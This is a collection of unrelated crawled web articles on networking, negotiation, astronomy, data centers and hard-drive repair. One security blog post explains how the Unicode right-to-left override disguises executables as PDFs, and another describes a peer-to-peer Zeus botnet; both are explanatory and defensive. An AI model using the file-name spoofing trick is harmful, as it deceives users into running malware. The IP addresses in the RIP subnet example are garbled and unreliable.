s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279189.36/warc/CC-MAIN-20170116095119-00319-ip-10-171-10-70.ec2.internal.warc.gz
en
0.926389
1,026
3.0625
3
Definition: A path that starts and ends at the same vertex and includes at least one edge. Generalization (I am a kind of ...) Specialization (... is a kind of me.) Hamiltonian cycle, Euler cycle. Aggregate parent (I am a part of or used in ...) Note: Also known as "circuit" or "closed path". A cycle is usually assumed to be a simple path ignoring the start (and end) vertex. That is, it include vertices other than the start/end at most once. Having at least one edge means that there are at least two vertices in the path: the start/end and one other. It also means the path length is at least one. One way to find a cycle is to do a depth-first search, checking for repeated vertices. One step in finding all cycles is to look for strongly connected components. If you have suggestions, corrections, or comments, please get in touch with Paul Black. Entry modified 4 November 2009. HTML page formatted Mon Feb 2 13:10:39 2015. Cite this as: Paul E. Black, "cycle", in Dictionary of Algorithms and Data Structures [online], Vreda Pieterse and Paul E. Black, eds. 4 November 2009. (accessed TODAY) Available from: http://www.nist.gov/dads/HTML/cycle.html
<urn:uuid:6693b65e-1d14-4966-94f4-71e44bab5f4a>
CC-MAIN-2017-04
http://www.darkridge.com/~jpr5/mirror/dads/HTML/cycle.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280801.0/warc/CC-MAIN-20170116095120-00043-ip-10-171-10-70.ec2.internal.warc.gz
en
0.913987
303
3.328125
3
Originally published September 23, 2010 Imagine a geologist who gathers data from a volcano in Hawaii twice a year for troubling indicators of an impending eruption. Over the years, this scientist would collect quite a heap of data on this volcano. But what would happen if, instead of sending the scientist out twice a year, sensors were installed to measure things like temperature and vibrations every five minutes? The volume of data collected would grow over 100,000 fold. There are a lot of troubling statistics about growing data volumes in the enterprise and the cost of storage, but sensors are poised to add more data to the scene than any other technology or sector. The cost of microsensors is plummeting, intelligent devices are expected to grow nearly six-fold by 2013, and automated data collection of the physical world is heralding what some call “the Internet of things.” IBM would call it a “smarter planet.” Whether it’s millions of RFID tags in Walmart’s supply chain, a network of sensors monitoring the nation’s water reserves or – over the next decade – sensors that control cars and traffic, huge volumes of streaming data on the real world create interesting and powerful new applications of analytics, but will be utterly crippling for conventional relational databases or RDBMSs. A large manufacturing plant could be collecting information such as temperature, pressure and humidity from hundreds of different key points in the plant every minute, resulting in a fire hose of data much larger and faster than anything that a human being would measure and input traditionally. To detect anomalies or safety issues early, data would need to be processed in near real time. Moreover, if sensors are creating a snapshot of data every minute, even a data table for a single measurement would have more than 500,000 rows after a year or five million rows in ten years. Without any built-in intelligence, each query would be forced to examine every row. As pointed out by Dr. Michael Stonebraker in “Data Torrents and Rivers” (IEEE SPECTRUM, September 2006), the overhead accruing from the multiuser switching and persistent storage processes of conventional RDBMSs is prohibitive and “A new class of system software … is required.” However, we’ve demonstrated that the overhead of conventional RDBMSs is not an inherent consequence of the relational data model, but only of their historical design limitations. Unfortunately, despite incredible maintenance burdens, laggard performance, and incompatibility with a growing portion of data that’s unstructured, we insist on using conventional RDBMSs for advanced analytics when it’s indelibly clear they will never be able to handle the real-time data feeds of the future. Despite the shortcomings of the current model, the majority of IT executives have great difficulty imagining a corporate database that’s not managed by a conventional RDBMS. Even as we hire a growing staff to manage the data and spend millions on hardware and software, we’re latched on to the 30-year old relational data model for applications far beyond their capabilities. I believe the proliferation of sensors may be what finally breaks the camel’s back. The volume, speed and accessibility requirements will be so incredibly high that an army of thousands of data managers could not even make a dent on structuring a database that houses street-level information from “smart cities” in an entire state. No conventional RDBMS will be able to process it at any price. We will have to learn a new trick – and it’s about time.
<urn:uuid:7758feca-1e73-438a-bf25-f0ee26d42152>
CC-MAIN-2017-04
http://www.b-eye-network.com/channels/1134/view/14417
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281069.89/warc/CC-MAIN-20170116095121-00529-ip-10-171-10-70.ec2.internal.warc.gz
en
0.93329
744
2.703125
3
Introduction to Negotiation: A Primer for "Getting to Yes" Negotiation is a dialogue intended to resolve disputes, to produce an agreement on courses of action, to bargain for individual or collective advantage, or to craft outcomes to satisfy various interests. It is the primary method of alternative dispute resolution. This white paper focuses primarily on the negotiation process, different negotiation styles, and the various elements of communication that affect the outcome, including: Negotiation Communications, Constructive Questioning, Communication Obstacles (and overcoming those obstacles), Challenging Negotiation Situations and "Traps," and, finally, completing Successful Negotiations, a.k.a. "Getting to Yes" Negotiation is the process where two or more individuals offer and approve concessions to arrive at an accepted agreement. The negotiation process comprises steps you can take to achieve a productive and effective negotiation. The negotiation process contains these five steps: 1. OPEN the negotiation positively. 2. PRESENT an agenda and budget time for each topic. 3. DISCUSS items on the agenda. 4. REVIEW the agreement. 5. CLOSE the negotiation on a positive note. Open the Negotiation Positively Open the negotiation by establishing a positive environment. Welcome the other party and thank them for participating. Communicate to the other party the ideal conclusion for the negotiation, and communicate assurance that a mutually beneficial negotiation is going to happen. Present an Agenda and Budget Time for Each Topic Inform the other party that you have created an agenda for the negotiation, and confirm with the other party if they could review it. Once it is confirmed that the agenda is acceptable, and then ask the other party to help budget time for each item which needs to be discussed. Discuss Items on the Agenda Discuss the items on the agenda following the time line that was established. If there is difficulty agreeing on the time limits, then ask if you can revisit the item later. If the other party appears hesitant, then suggest a quick break to allow either side a moment to contemplate the matter. Review the Agreement When you and the other party are about to agree, ask for a couple of minutes to examine what has happened. This step is essential, because it enables you to step back from the negotiation and clear your thoughts. Additionally, it helps you to evaluate the terms that have been offered so that your decision isn't impulsive. Close the Negotiation Positively After discussing the items on the agenda, close the negotiation on a positive note. Even if you are unable to reach an agreement, it is important to maintain a good relationship. Stay clear of leaving any unresolved negativity that could make the other party hesitant to carry out future negotiations with you or your organization. Thank the other party for engaging in the negotiation and, if required, inform them that you will be in contact to arrange future discussions. Negotiation styles are about how people interact with other people during a negotiation. For instance, one person's style could be accommodating while another person might be competitive. When the participants' strengths work effectively together, the negotiation process can be efficient and effective for both parties. Alternately, when the negotiation styles of the parties involved in the negotiation clash, the process can be difficult, and either of the parties may depart from the negotiation process feeling disappointed. Every negotiation style consists of weaknesses and strengths that can limit or boost the negotiation process; as a result, a negotiation isn't just a result of the individual style of each participant but also by the combination of styles of everyone active in the negotiation. The list below comprises five of the major negotiation styles. The accommodating style is a passive model of negotiation. This model is most effective whenever targets are more crucial to the other party than they are to you. The accommodating style enables you to briefly forfeit your position for the chance to accomplish future favors. Whenever you select the accommodating style, you would rather develop a good relationship with the other party than accomplish all of your targets. When you believe your position is weaker compared to the other party's, then accommodation can potentially help you reach a short-term resolution. However, you should not consider accommodation when the target item holds higher importance for you or when you feel the other party is behaving untruthfully, controlling, or deceitful. Letting the other party dominate can cause you dissatisfaction and future clashes with the other party. Any time you see the other party behaving inappropriately, work to talk through disparities to assure that both parties appreciate each others point of view. The avoidance style is another passive style of negotiation. Its lose-lose positioning inhibits useful communication between the negotiating parties. Avoidance can cause feelings of dissatisfaction and anxiety, in addition to limiting personal and organizational progression of longer-term relationships, given that it can impair the negotiation process.
<urn:uuid:4f7ce356-3bf6-4cfb-a164-8ebf803e7e17>
CC-MAIN-2017-04
https://www.globalknowledge.com/ca-en/resources/resource-library/white-paper/introduction-to-negotiation-a-primer-for-getting-to-yes/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00253-ip-10-171-10-70.ec2.internal.warc.gz
en
0.929692
983
3.375
3
Why Don't RIPv1 and IGRP Support Variable-Length Subnet Mask? The ability to specify a different subnet mask for the same network number on different subnets is called Variable-Length Subnet Mask (VLSM). RIPv1 and IGRP are classful protocols and are incapable of carrying subnet mask information in their updates. Before RIPv1 or IGRP sends out an update, it performs a check against the subnet mask of the network that is about to be advertised and, in case of VLSM, the subnet gets dropped. Let's look at an example. In the figure below, Router 1 has three subnets with two different masks (/24 and /30). Router 1 goes through the following steps before sending an update to Router 2. These steps are explained in more detail in Behavior of RIP and IGRP When Sending or Receiving Updates. - First Router 1 checks to see whether 126.96.36.199/24 is part of the same major net as 188.8.131.52/30, which is the network assigned to the interface that will be sourcing the update. - It is, and now Router 1 checks whether 184.108.40.206 has the same subnet mask as 220.127.116.11/30. - Since it doesn't, Router 1 drops the network, and doesn't advertise the route. - Router 1 now checks whether 18.104.22.168/30 is part of the same major net as 22.214.171.124/30, which is the network assigned to the interface that will be sourcing the update. - It is, and now Router 1 checks whether 126.96.36.199/30 has the same subnet mask as 188.8.131.52/30. - Since it does, Router 1 advertises the network. The above checks determined that Router 1 only includes 184.108.40.206 in its update that is sent to Router 2. Using the debug ip rip command, we can actually see the update sent by Router 1. It looks like this: RIP: sending v1 update to 255.255.255.255 via Serial0 (220.127.116.11) subnet 18.104.22.168, metric 1 Notice that in the output above only one subnet is included in the update. This results in the following entry in Router 2's routing table, displayed using the show ip route command. 22.214.171.124/30 is subnetted, 3 subnets C 126.96.36.199 is directly connected, Serial0 C 188.8.131.52 is directly connected, Ethernet0 To avoid having subnets eliminated from routing updates, either use the same subnet mask over the entire RIPv1 network or use static routes for networks with different subnet masks.
<urn:uuid:c96fe538-6e84-461a-91b4-33c9f93dc1f3>
CC-MAIN-2017-04
https://www.certificationkits.com/rip-igrp-ccna/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280280.6/warc/CC-MAIN-20170116095120-00181-ip-10-171-10-70.ec2.internal.warc.gz
en
0.893297
606
2.53125
3
A company has discovered how to not just open the window to the soul via one’s eyes, but also accurately determine whether or not that soul is lying. For years, “polygraph” and “lie detector” have been synonymous. That’s because since 1939 the FBI has been using the polygraph — an instrument that monitors a person’s involuntary physiological reactions. Its accuracy is estimated to be between 65 and 85 percent. No other viable, proven solution to detect deception has emerged to join the polygraph, until now. Scientists at Converus have spent the last 10 years perfecting a noninvasive lie detection method called EyeDetect, which monitors eye behavior, making it the first deception detection product based on an ocular-motor deception test. Validation trials showed it 85 percent accurate. The exam only takes 30-40 minutes. “We deal with a lot of sensitive information where the potential for risk is very high,” said Vilash Poovala, co-founder and CTO of PayClip. developer of Clip — a card reader that enables users in Mexico to accept credit and debit card payments through their smartphones and tablets. “We need to make sure the people we hire can be trusted. Technology like EyeDetect that can effectively screen potential employees for previous issues with theft or fraud is long overdue.” Corruption and fraud is a $2.6 trillion worldwide problem annually, with businesses some of the hardest hit. For example, $400 million was recently stolen from Citigroup Inc.’s Mexico unit, Banamex. Converus will focus its initial efforts showing businesses how the EyeDetect technology, when used for pre-employment and periodic screening of existing employees, can help to more effectively manage risk and ensure workplace integrity.
<urn:uuid:a12a33c9-f6ff-417c-a9cf-8bb5d0921f43>
CC-MAIN-2017-04
https://www.helpnetsecurity.com/2014/04/10/lie-detection-technology-that-accurately-reads-eye-behavior/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280730.27/warc/CC-MAIN-20170116095120-00511-ip-10-171-10-70.ec2.internal.warc.gz
en
0.9482
371
2.625
3
At the Web 2.0 Summit in San Francisco this week, NVIDIA announced a GPU-powered 3D Web platform. Called the NVIDIA RealityServer, it consists of Tesla GPUs, rendering software and a Web service environment, all integrated into a platform designed to deliver photorealistic image streams via a cloud computing model. The new offering is yet another example of how the company intends to push its high-end GPUs into CPU territory. The basic idea behind RealityServer is to do all the heavy computation lifting of image rendering on the server side, such that photorealistic 3D content can be delivered interactively across the Web. That means mass-market devices from smart phones to desktops and everything in between can be used to do high-end imaging. Applications include architectural design, product design, manufacturing and apparel styling, as well as HPC visual applications in such areas as oil and gas, medical diagnostics, and scientific research. As a result, potential users span the entire population: consumers, artists, product designers, doctors, architects, engineers, and scientists. The big emphasis here is on photorealistic images. Generating such content is extremely compute intensive since the software must calculate the effects of light bouncing off the objects in a scene. Rendering a single photorealistic frame for a complex image can take a whole day on a typical CPU-based workstation. So unless one happens to own a deskside HPC machine (which may themselves contain NVIDIA GPUs), client-side processing is usually not able to deliver this interactive user experience. Significantly, NVIDIA is not yet claiming this can be used to deliver photorealistic animation. For that to happen, presumably gamers and graphics animators will have to wait until GPU horsepower increases to the point where real-time photorealistic animation is practical. Theoretically, someone could build a big enough GPU cluster to do this today (or with Fermi GPUs next year), but computing 60 photorealistic frames per second is not likely to be economically feasible in the near term. The critical 3D software component of RealityServer is iray, a photorealistic rendering technology developed by mental images, an NVIDIA subsidiary the company bought two years ago. The iray software is essentially a GPU-accelerated rendering mode of its flagship mental ray product. The iray software uses global illumination, which requires a lot more computational horsepower than garden variety ray-tracing (which usually only approximates global illumination or just uses direct illumination). True global illumination, however, blends the effect of direct and indirect light and will produce a much more refined image, almost indistinguishable from a photograph. Rolf Herken, founder, CEO and CTO of mental images, characterized iray as “the first physically correct renderer.” In this case, the quality of the image is dependent on the fidelity of the input data rather than the algorithm. The feature that makes this practical in a cloud environment is iray’s ability to scale across many GPUs. According to the iray FAQ (PDF), the software scales “completely linearly on a local system, almost linearly on RealityServer across multiple machines.” The RealityServer software itself encompasses the iray renderer as well as the rest of the software stack that turns 3D imaging into a Web service. OpenGL is also supported for situations where iray computation would be too slow to deliver interactive rendering. As one might suspect, RealityServer includes support for standard CAD and digital content creation formats and can run under both Linux or Windows. The hardware environment for RealityServer is NVIDIA’s new Tesla RS platform, which comes in medium (8-31 GPUs), large (32-99 GPUs), and extra-large (100-plus GPUs) configurations. The Tesla device was presumably used since the high-end graphics chip and the larger memory capacity is specifically aimed at big GPU computing workloads. The smallest RS configuration is aimed at workgroups (for example, a group of collaborating architects), while the largest configuration is designed for thousands of concurrent users. This is only a general guideline, since some applications, like medical or oil & gas imaging, require multiple GPUs per user, while others, such as online entertainment, can support many users with a just single GPU. NVIDIA is pointing interested parties who want to build RealityServer GPU server infrastructure to its OEM partners (which include HPC vendors Colfax, Appro, and Penguin Computing), but is not indicating which manufacturers are actually offering these configurations today. The RealityServer software itself will be available on Nov. 30, when a developer edition will be made available free of charge, including the right to deploy non-commercial applications. No mention was made of licensing RealityServer or iray for commercial applications. As far as who will end up offering RealityServer infrastructure, NVIDIA is hoping public cloud providers, like for example Amazon, will be interested in adding this capability into their offerings. Private GPU clouds are also on the table, and frankly, are the more likely scenario in the short term, since I’m guessing a critical mass of RealityServer applications will need to be developed for the big cloud providers to be interested. In the NVIDIA press release, there were a handful of comments from some initial RealityServer customers, including mydeco.com, SceneCaster, and Wichita State University’s Virtual Reality Center at the National Institute for Aviation Research. Undoubtably, there is more low-hanging fruit out there waiting to be picked. The ease of developing these RealityServer applications will likely portend the success of the business in general. Users, of course, may be squeamish about locking their software to a specific vendor’s platform, but with no competing offering currently on the market, the choice may become simple. And if NVIDIA supports RealityServer efforts in the same manner it is using to develop the CUDA ecosystem, the company may indeed have a winning model for GPU computing in the cloud.
<urn:uuid:e483c256-bcc5-4baa-9408-27622c121d64>
CC-MAIN-2017-04
https://www.hpcwire.com/2009/10/21/nvidia_pitches_gpu_computing_in_the_cloud/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279248.16/warc/CC-MAIN-20170116095119-00164-ip-10-171-10-70.ec2.internal.warc.gz
en
0.91854
1,214
2.53125
3
Concept of FTTx A simple understanding of FTTx is Fiber to the x, x here can be replaced such as H for home, B for building, C for curb or even W for wireless etc. It is a new technology used in today’s network. As we know, compared to copper or digital radio, fiber’s high bandwidth and low attenuation easily offset its higher cost. To install fiber optics all the way to the home or the users’ working places has always been the goal of fiber optic industry. Thanks to optical fiber all the way to subscriber, we can get unprecedented higher speed in enjoying more services at home, such as teleworking, tele-medicine, online shopping and so on. It is precisely because the demands for bandwidth keeps spiraling upwards, FTTx technology now is very popular with people and has to be imperative. FTTx Enabling Technologies According to the different termination place, the common FTTx architectures include these following types: 1. FTTC: Fiber To The Curb (or Node, FTTN) Fiber to the curb brings fiber to the curb, or just down the street, close enough for the copper wiring already connecting the home to carry DSL (Digital Subscriber Line). Actually, FTTC bandwidth depends on DSL performance where the bandwidth declines over long lengths from the node to the home. Though the cost of FTTC is lower than FTTH in the first time installation, it is limited by the quality of the copper wiring currently installed to or near the home and the distance between the node to the home. Thus, in many developed, FTTC is now gradually upgrade to FTTH. 2. FTTH Active Star Network FTTH active star network means that a home run active star network has one fiber dedicated to each home. It is the simplest way to achieve fiber to the home and offers the maximum amount of bandwidth and flexibility. However, this architecture generally needs a higher cost, as the requirements of the both in electronics on each end and the dedicated fibers for each home. 3. FTTH PON (Passive Optical Network) The FTTH architecture consists of a passive optical network (PON) that allows several customers to share the same connection, without any active components (i.e., components that generate or transform light through optical-electrical-optical conversion). In this architecture, it usually needs a PON splitter. PON splitter is bi-directional, that is signals can be sent downstream from the central office, broadcast to all users, and signals from the users can be sent upstream and combined into one fiber to communicate with the central office. The PON splitter is an important passive component used in FTTH networks. There are mainly two kinds of passive optical splitters: one is the traditional fused type splitter as known as FBT coupler or FBT WDM optical splitter, which features competitive price; the other is the PLC splitter based on the PLC (Planar Lightwave Circuit) technology, which has a compact size and suits for density applications. Because it cuts the cost of the links substantially by sharing, this architecture is more prefered by people when choosing the architecture. There are two major current PON standards: GPON(gigabit-capable PON) and EPON(Ethernet PON). The fomer uses IP-based protocol, based originally on ATM protocols but in its latest incarnation using a custom framing protocol GEM. EPON is based on the IEEE standard for Ethernet in the First Mile, targeting cheaper optical components and native use of Ethernet. In addition, there is BPON(broadband PON), was the most popular current PON application in the beginning. It also uses ATM as the protocol (BPON digital signals operate at ATM rates of 155, 622 and 1244 Mb/s). The deployment technologies of FTTx generally mean the fiber optic cables deployment. And during the fiber optic cables deployment, the termination of fiber optic cable is usually a important part of it. When we begin fiber optic termination, splicing one of the necessary step. Fiber optic splicing includes fusion splicing and mechanical splicing, and now, fusion splicing is more widely used as its good performance and easy operation. In addition, cleaving, polishing and ends cleaning are also important in the fiber optic termination. Except the necessary steps of fiber optic termination, good connectors, pigtails and fiber terminal box (FTB) and the tool kits are also as the essential parts during the fiber optic terminal item. Testing and Commissioning FTTx Network Though it reduces the cost of using fiber optics, compared to other network, the components of FTTx seem to be more expensive. Meanwhile, in order to ensure the network work well, it is necessary to test and commission the network. Testing FTTx network is similar to other OSP (Out Side Plant) testing but the splitter and WDM add complexity. The common used testers include: VFL – VFL, short for Visual Fault Locator, is a kind of device which is able to locate the breakpoint, bending or cracking of the fiber glass. It can also locate the fault of OTDR dead zone and make fiber identification from one end to the other end. Designed with a FC,SC,ST universal adapter, this fiber testing red light is used without any other type of additional adapters, it can locates fault up to 10km in fiber cable, with compact in size, light in weight, red laser output. Power Meter and Light Source – Power Meter is used to measure received signal power while Light source is used to launch optical in modulated and unmodulated wave into fiberunder-test. Usually the optical light source is used with the fiber optic power meters, they act as an economic and efficient solution for the fiber optic network works. It is the most straight-forward way to test the fiber loss. Optical Time Domain Reflectometer (OTDR) – OTDR is an optoelectronic instrument used to characterize an optical fiber. It can offer you an overview of the whole system you test and can be used for estimating the fiber length and overall attenuation, including splice and mated-connector losses. It can also be used to locate faults, such as breaks, and to measure optical return loss. It is an expensive tester, and needs more skills to use. OCWR (Optical Continuous Wave Reflectometer) – OCWR is an instrument used to characterize a fiber optic link where in an unmodulated signal is transmitted through the link, and the resulting light scattered and reflected back to the input is measured. It is useful in estimating component reflectance and link optical return loss. Optical Fiber Scope – Optical fiber scope is used for inspecting fiber terminations, providing the most critical view of fiber and faces. It can be able to perform visual inspection and examination of the connector end face for irregularities, i.e. scratches, dirt etc. Magnification can be up to 400x. Doubtless, FTTx technology will continue to spread. With the higher and higher requirement of the network speeds, the requirement of FTTx is also improved both in technology and cost saving. And the next generation of PONs, such as 10G GEPON, WDM PON etc. also play an important role in the FTTx development. Maybe one day, we could enjoy the FTTd, ie. fiber to the desk and enjoy a avariety of modern network services.
<urn:uuid:c2403cd7-560c-4d91-b75c-2fda2940ec98>
CC-MAIN-2017-04
http://www.fs.com/blog/a-comprehensive-understanding-of-fttx-network.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280133.2/warc/CC-MAIN-20170116095120-00072-ip-10-171-10-70.ec2.internal.warc.gz
en
0.931505
1,559
3.234375
3
Three-phase AC power is everywhere. Every major power generation and distribution system in the world uses some variation of it. The reason is simple: Three-phase power systems allow a utility to ship more power over smaller (and cheaper) wires than would be possible in a single-phase system. IT organizations should turn to it in their data centers' racks. As server gear has undergone relentless waves of miniaturization, with the contemporary equivalent of the behemoth rack servers of years ago now boiled down to a sub-rack-unit blade, the amount of compute capacity that can be delivered in a single cabinet has risen dramatically. However, so too has the amount of power that a single rack of modern servers can consume. Years ago, you might fit eight or nine of the most power-hungry servers into a rack and consume around 5kW in the process. Today, you can easily fit 50 or 60 in the same space -- some blade platforms allow twice that -- and consume more than 30kW in total. Why your data center's single-phase power can't do the job any longer The typical single-phase power distribution systems are ill-suited to these kinds of loads. For example, as you start to move beyond a fairly typical 30-amp high-voltage circuit, the conductors, plugs, and sockets required to supply ever-increasing amperages become heavier, more difficult to work with, and progressively more expensive. To continue reading, register here to become an Insider This story, "Data center power maxed out? Three-phase power to the rescue!" was originally published by InfoWorld.
<urn:uuid:715cde72-6e62-4996-8b4a-e9827d932761>
CC-MAIN-2017-04
http://www.itworld.com/article/2712188/data-center/data-center-power-maxed-out--three-phase-power-to-the-rescue-.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280483.83/warc/CC-MAIN-20170116095120-00558-ip-10-171-10-70.ec2.internal.warc.gz
en
0.938198
334
2.859375
3
NASA's black-hole-hunting spacecraft NuSTAR hit its first major milestone, detecting 10 "supermassive" black holes. NASA reported on Thursday that those 10 finds are the first of what scientists hope will be hundreds of black hole discoveries. The 10 black holes detected are what NASA calls "gargantuan structures." The black holes are surrounded by thick disks of gas and lie at the hearts of distant galaxies between 0.3 billion and 11.4 billion light-years from Earth. A black hole is an area in space with such intense gravitational pull that matter, and even light, cannot escape it. "We found the black holes serendipitously," said David Alexander, a NuSTAR team member based in the Department of Physics at Durham University in England. "We were looking at known targets and spotted the black holes in the background of the images." The spacecraft, which consists of a telescope with a mast the length of a school bus, was launched into Earth orbit in June 2012. It's the first telescope capable of focusing high-energy X-ray light into detailed pictures. According to the space agency, by combining observations taken across the range of the X-ray spectrum, astronomers hope to crack unsolved mysteries of black holes, such as how many there are in the universe. The space telescope will make targeted surveys of areas of space in the hunt for more black holes, NASA said. However, scientists also intend to scan hundreds of other images that the telescope has taken in the hopes of finding black holes in the background. For instance, once NuSTAR spotted the first 10 black holes, scientists went back to study images taken by other telescopes, including NASA's Chandra X-ray Observatory and the European Space Agency's XMM-Newton satellite. Scientists found that images of the black holes had been caught by these other devices but weren't spotted without closer inspection. "We are getting closer to solving a mystery that began in 1962," Alexander said in a statement. "Back then, astronomers had noted a diffuse X-ray glow in the background of our sky but were unsure of its origin. Now, we know that distant supermassive black holes are sources of this light, but we need NuSTAR to help further detect and understand the black hole populations." This article, NASA's NuSTAR telescope detects images of 10 'supermassive' black holes, was originally published at Computerworld.com. Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at @sgaudin, on Google+ or subscribe to Sharon's RSS feed . Her email address is email@example.com.
<urn:uuid:b9e96e2a-eb77-4463-873f-82aceaba1980>
CC-MAIN-2017-04
http://www.computerworld.com/article/2484691/emerging-technology/nasa-s-nustar-telescope-detects-images-of-10--supermassive--black-holes.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280504.74/warc/CC-MAIN-20170116095120-00402-ip-10-171-10-70.ec2.internal.warc.gz
en
0.950924
560
3.78125
4
After my post about extensions, I received some requests to deal with another method of pretending to be a different type of file. If you have not read that article yet, it will prove helpful to do that first in order to better understand this post. What is RTLO (aka RLO)? The method called RTLO, or RLO, uses the method built into Windows to deal with languages that are written from right to left, the “Right to left override”. Let’s say you want to use a right-to-left written language, like Hebrew or Arabic, on a site combined with a left-to-right written language like English or French. In this case, you would want bidirectional script support. Bidirectional script support is the capability of a computer system to correctly display bi-directional text. In HTML we can use Unicode right-to-left marks and left-to-right marks to override the HTML bidirectional algorithm when it produces undesirable results: left-to-right mark: ‎ or (U+200E) right-to-left mark: ‏ or (U+200F) How is RTLO being abused by malware writers? On systems that support Unicode filenames, RTLO can be used to spoof fake extensions. To do this we need a hidden Unicode character in the file name, that will reverse the order of the characters that follow it. Look for example at this file, a copy of HijackThis.exe, that I renamed using RTLO: The last seven characters in the file name are displayed backwards because I inserted the RTLO character before those seven characters. As discussed in the previous article, assigning a matching icon to a file is a triviality for a programmer. So here we have an executable file that seems to have the PDF extension. Ironically, you will see straight through this deception if you are still running XP, since it does not support these file names: The square symbol shows us where the Unicode RTLO character is placed. One way to catch these fakes on more modern versions of Windows is to set the “Change your view” ruler to “Content”. Set this way, you can see that the files are applications and not a PDF or jpg. This may be a good idea for your “Download” folder(s), so you can check if you have downloaded what you expected to get. Is the RTLO method actively being used? The technique has been know for quite a while and is starting to re-surface. It is not only being used for filenames by the way. A malware known as Sirefef (which Malwarebytes Anti-Malware detects as Trojan.Agent.EC ) uses the RTLO method to trick users into thinking that the entries it puts into the infected machine’s registry are legitimate ones, belonging to Google update. Does this have any effect on the detection of these files? No. Detection of malicious file is never done by a filename alone. So your AV and Malwarebytes Anti-Malware will still recognize these files if they were added to their detection, no matter what they are called or how they are written. Summary: RTLO is used to fake extensions by writing part of the filename or other descriptions back to front. Although the detection by your AV or Malwarebytes Anti-Malware is not altered in any way this trick can be deceiving users at first glance.
<urn:uuid:80b900c0-e0b4-4b79-9ad5-15fdd0c0f5de>
CC-MAIN-2017-04
https://blog.malwarebytes.com/cybercrime/2014/01/the-rtlo-method/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00310-ip-10-171-10-70.ec2.internal.warc.gz
en
0.931496
732
2.8125
3
The P2P network architecture enables the botnet to stay alive and gather information, even if portions of the network are shut down, observed Andrea Lelli in a Symantec blog. The new Zeus/Spye variant appears to have discarded the C&C server and to use a P2P network architecture exclusively. “This means that every peer in the botnet can act as a C&C server, while none of them really are one. Bots are now capable of downloading commands, configuration files, and executables from other bots – every compromised computer is capable of providing data to the other bots”, Lelli wrote. “We don’t yet know how the stolen data is communicated back to the attackers, but it’s possible that such data is routed through the peers until it reaches a drop zone controlled by the attackers”, she added. Law enforcement has been able to take down botnets in the past by shutting down the C&C servers. However, with a P2P network architecture, a botnet can avoid this single point of vulnerability. “If they managed to completely remove C&C servers then this can be considered a step towards strengthening the botnet. If it only operates through P2P, it becomes nearly impossible to track the guys behind it. Again, analysis is still ongoing, so we are working on uncovering this part of the mystery to figure out the full picture”, Lelli concluded.
<urn:uuid:fa665d78-0bd5-4745-8c25-aaed59d2bbc3>
CC-MAIN-2017-04
https://www.infosecurity-magazine.com/news/zeusbotspyeye-variant-uses-peer-to-peer-network/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00310-ip-10-171-10-70.ec2.internal.warc.gz
en
0.947879
305
2.609375
3
In Gillware’s latest blog series, “Data Recovery 101″, our bloggers take a closer look at each of the different components of a hard drive and explain how they work, how they fail and how we recover the data from each failure situation. In this post, we’ll explore the read/write head assembly. Read/write heads are the tiny sensors (about 0.1 – 0.3mm tiny) that do just what their name implies: read data stored on the platters and write data to the platter surface. Although some hard drive configurations involve just a single read/write head, most modern drives involve multiple heads stacked together to form what is referred to as a head stack assembly. The number of heads depends on the storage capacity of the drive. Higher capacity drives have more heads than lower capacity drives. The head itself is little more than a tiny coil of copper. When reading data, the platters magnetic field induces an electrical current in the read/write head coil. This current is interpreted by the HDD’s controller as a binary 1 or 0. When writing data, the HDD controller sends current to the read/write coil which induces a magnetic field that alters the bits stored on the hard drive platter effectively “writing” data to the drive. How do the mechanics of read/write heads work? The read/write head is designed to behave like a very small wing. When the drive is running, the platters spin at thousands of revolutions per minute generating a significant amount of airflow inside the drive chassis. When this airflow impacts the heads, they lift just like an airplane lifts when it achieves enough airflow over its wings. In normal operation, the read/write head floats just 3-5 nanometers above the surface of the platters. When the HDD receives a read or a write command, the heads seek to the area(s) of the platter where to which the data is to be read or written. In older drives, head positioning was controlled by a servo motor moving the read/write assembly across the platter surface. Servo motors were phased out over the years because they were a bottleneck preventing HDDs from meeting the demands of the market in terms of performance and drive capacity. Servo motors were replaced as the head positioning component in HDDs with a much higher performance design commonly referred to as a moving coil motor. With this design, a coil of copper wire is attached to the end of the head stack assembly. The copper coil is sandwiched between two powerful magnets. When current is feed to the copper coil, a magnetic field is generated and the head stack is “pushed” and “pulled” to the correct position on the platter As you may have guessed, the read/write heads are a common failure point in hard drives. They are one of the hardest working components inside a hard drive and also one of the most delicate. This, coupled with the fact that they are operating just a few nanometers above the surface of the platters, means that, although not common, failures can and do occur. There are a number of different ways the heads can fail. For example, if the drive unexpectedly loses power due to an electrical surge, power outage or hard shut down, the cushion of air over the surface of the platters dissipates before the heads have a chance to repark properly. In this instance, known as a head crash, the heads can contact the delicate platter surface while they are still spinning, causing damage to the magnetic substrate on the surface of the platters where the data is stored, or damage to the heads themselves. Head crashes, and consequently head failures, can also be caused by dragging a laptop across a desk, dropping and external hard drive on the floor, or simply as the result of mechanical fatigue or component wear. When heads fail, the HDD will often times make a clicking sound, which is the result of the head stack assembly flying blindly from one extent of the platter to the other. When the heads encounter the head stop, they make the clicking noise. Recovering data from a hard drive with failed read/write heads may seem easy in theory. Just swap the bad heads out for a working head stack and voila, you’re done. However, there are a number of challenges that make replacing failed read/write heads difficult: - Finding correct donor heads: It can be difficult to find the right donor heads for the failed hard drive. All read/write heads are not created equal. Heads change from manufacturer to manufacturer and from model to model. Modern hard drives are so sophisticated and tightly calibrated that the heads from two drives made one after the other on the production line may not be compatible with one another.There are two key factors that make Gillware very successful when it comes to replacing read/write heads. First, we have thousands of hard drives 